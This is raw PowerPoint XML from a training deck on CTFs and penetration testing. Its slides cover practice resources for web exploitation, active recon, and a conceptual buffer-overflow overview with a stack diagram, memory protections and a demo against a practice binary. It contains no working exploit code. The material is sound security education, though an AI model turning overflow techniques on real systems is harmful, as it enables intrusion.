        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="795436" y="4632620"/>
            <a:ext cx="4801270" cy="1314633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE24E4F6-03BD-49DF-8FDF-C457E64711CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6160884" y="3342763"/>
            <a:ext cx="5848996" cy="1666519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58D4A523-8A90-4D30-8FA3-3C0D1BFCF096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6595296" y="5221774"/>
            <a:ext cx="5171928" cy="913094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="489083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9F895-C7DF-452E-999E-8F52C7DB83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08604587-0830-48C5-A75C-1257D32A5D10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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575887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A453A5-4DD7-4F2C-B3F4-43AE0B1DD8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14A728CD-B7F4-4882-A454-5082EB58B184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Closing Thoughts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CFE50AD-53BE-4BEB-8AEF-15DC3052B3A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="6493358" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many CTFs will use web applications as an entry point – get a lot of practice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resources: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Damn Vulnerable Web App (dvwa.co.uk)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Over The Wire – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Natas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (overthewire.org)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be patient and curious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A lot of experimentation, documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burp Suite is your friend, even if you aren’t using Intruder or Repeater</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A picture containing text, picture frame, businesscard&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63DC820E-FFE1-4CA9-906C-83974545248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778" b="93778" l="7556" r="91556">
                        <a14:foregroundMark x1="13333" y1="65333" x2="16444" y2="52444"/>
                        <a14:foregroundMark x1="17333" y1="50222" x2="25778" y2="25333"/>
                        <a14:foregroundMark x1="26222" y1="24000" x2="31556" y2="16000"/>
                        <a14:foregroundMark x1="31556" y1="16000" x2="34222" y2="17333"/>
                        <a14:foregroundMark x1="26667" y1="19111" x2="32000" y2="15111"/>
                        <a14:foregroundMark x1="40444" y1="11556" x2="39111" y2="17778"/>
                        <a14:foregroundMark x1="39111" y1="12000" x2="48889" y2="6667"/>
                        <a14:foregroundMark x1="48889" y1="6667" x2="52444" y2="7111"/>
                        <a14:foregroundMark x1="39111" y1="9333" x2="46222" y2="6222"/>
                        <a14:foregroundMark x1="51111" y1="6222" x2="60000" y2="14222"/>
                        <a14:foregroundMark x1="60000" y1="14222" x2="60444" y2="26667"/>
                        <a14:foregroundMark x1="60889" y1="28000" x2="89778" y2="39111"/>
                        <a14:foregroundMark x1="90222" y1="40889" x2="91556" y2="52444"/>
                        <a14:foregroundMark x1="91556" y1="52444" x2="80000" y2="59111"/>
                        <a14:foregroundMark x1="80000" y1="60000" x2="41778" y2="77778"/>
                        <a14:foregroundMark x1="42222" y1="78667" x2="11556" y2="93778"/>
                        <a14:foregroundMark x1="13333" y1="64889" x2="7556" y2="82222"/>
                        <a14:foregroundMark x1="8000" y1="83556" x2="9778" y2="93778"/>
                        <a14:foregroundMark x1="9778" y1="93778" x2="9778" y2="93778"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7155511" y="1295400"/>
            <a:ext cx="4450081" cy="4450081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1462552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31C96-02F2-4B39-A3D1-09E54AF634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DB0D3B1-F5AC-4D52-B425-613C9C48B4F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="3052763"/>
            <a:ext cx="11363325" cy="752475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198587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4E939C-E132-408E-84D2-2038BEA721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B4961010-C60C-4F36-8965-36757F46A13C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active Recon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3169147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9FE6B-135A-41F1-A9F5-0262DB2A481E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Chapter 3:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Buffer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7880774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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Theory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack-based overflow overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory Discussion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Checklist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Immunity Debugger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo – THM oscp.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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8723587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5FCF3-F889-467A-BA25-5B62C70621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D1824EA-180C-4622-AE7E-709B49D7CDD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflow Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78265284-BA9B-41D9-A9CC-DE888D9B950D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="7726680" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Failed memory management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incoming data not validated against allocated memory (buffer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arbitrary data written to unintended locations (overflow)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The stack: memory allocated for function execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NX/DEP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>ata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>xecution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>revention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>ASLR: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>ddress </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>pace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>ayout </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>andomization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>PIE: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>osition-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>ndependent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>xecutable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Stack Canary: Detection of overflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6BE07D2-E7DA-4DB3-AF80-32FE096CDEBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458973" y="1517008"/>
            <a:ext cx="2362200" cy="4267200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F8F9B"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>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STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4DC5EA0-AE37-4CCB-85DC-7792EA592199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458973" y="5327008"/>
            <a:ext cx="2362200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FA8F30">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Function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C2BCE2B-D91B-4C8B-82C5-B6BC2B6BE9CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458973" y="4869808"/>
            <a:ext cx="2362200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FA8F30">
              <a:lumMod val="50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Parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB44729D-B1A2-4FEF-B4AF-B1B09A526DA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458973" y="2245016"/>
            <a:ext cx="2362200" cy="331206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B050"/>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AAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2CE6C86-DA68-435C-9671-A432221BB742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458973" y="2555612"/>
            <a:ext cx="2362200" cy="2329072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F34D47">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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9540029D-2106-462C-9642-AA8D6900BA5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8372588" y="5728918"/>
            <a:ext cx="24288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High memory (0xFFF…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13673139-6B5C-41CD-8523-A8FCF022749C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8372588" y="1199990"/>
            <a:ext cx="23166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Low memory (0x000…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B9738DB-C627-4125-9C16-F2EF8513CED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10842609" y="2222284"/>
            <a:ext cx="1426364" cy="369332"/>
            <a:chOff x="10789454" y="4849198"/>
            <a:chExt cx="1426364" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{293C07DD-B454-4D3C-9AEA-9D4C704088D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11018054" y="4849198"/>
              <a:ext cx="11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a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>The goal</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Arrow: Chevron 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1103FCA6-D54F-45B1-A7AC-594E26AC387B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="10789454" y="4878411"/>
              <a:ext cx="228600" cy="310905"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>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ndara"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE7D6AC2-A9DD-436D-ADE2-7E4E8D8B461E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458973" y="2249220"/>
            <a:ext cx="2362200" cy="331206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B050"/>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Return Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B63D34D-7114-4820-838A-41476BD23820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458973" y="2555612"/>
            <a:ext cx="2362200" cy="2329072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F34D47">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Buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173191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250"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="1"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par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="250"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="1"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25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p:bldP spid="24" grpId="0"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="1" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="29"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A32DC7-EC91-4475-B616-50E477BE08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14EFDD5-155B-4470-8182-7FB2EF6978A4}"/>
